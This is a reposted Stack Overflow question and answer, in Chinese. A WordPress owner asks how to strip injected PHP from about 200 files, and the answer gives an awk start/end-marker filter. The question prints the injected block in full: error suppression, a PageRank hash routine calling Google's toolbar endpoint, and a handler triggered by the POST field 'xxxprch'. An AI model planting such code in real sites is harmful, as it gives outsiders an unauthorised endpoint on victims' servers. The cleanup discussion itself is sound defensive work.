gpt4 book ai didi

sed - 什么是合适的 grep + sed 语法?

转载 作者:行者123 更新时间:2023-12-04 14:31:55 25 4
gpt4 key购买 nike

我安装了两个 wordpress,黑客试图在现有的 php 文件中注入(inject)一些 php 代码

没什么大不了的,但现在我必须从多个子目录中的大约 200 个文本文件中删除大约 20 行文本,而且 grep 和 sed 还不够好,无法弄清楚......

在“hacked wordpress”文件夹中搜索包含以下文本片段的所有 *.php 文件(包括子目录)然后删除该片段的命令语法是什么?

<?php
//{{56541616

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);

$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;

$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);

for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}

$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}

return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
error_reporting($olderrxxx);
}

//}}18420732
?>

最佳答案

我不会为此使用 sed 和 grep - 两者都只在行上运行并且不记得之前发生了什么。我通常使用awk。这是大多数 awk 教程在非常基础之后开始的事情。基本上,您创建了三个匹配 block ,一个匹配开头,一个匹配结尾,一个匹配其余部分。在“打开”和“关闭”中,您可以设置或重置一个 bool 值来跟踪是否打印当前行。在处理其余行时,您根据此 bool 值打印或不打印。

此外,请记得在运行前备份您的文件。您不会是第一个因打字错误而措手不及的人。

/startsequence/    { ignoring=true; }/endsequence/      { ignoring=false; }{ if (!ignoring) print }

用您自己的有效开始和结束序列替换 startsequence 和 endsequence。如果这些数字实际上始终存在,请使用它们。我还没有检查过这个(因为我现在在没有 cygwin 的 Windows 机器上)但我认为它有效。受示例启发 here编辑:添加示例

关于sed - 什么是合适的 grep + sed 语法?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6131801/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com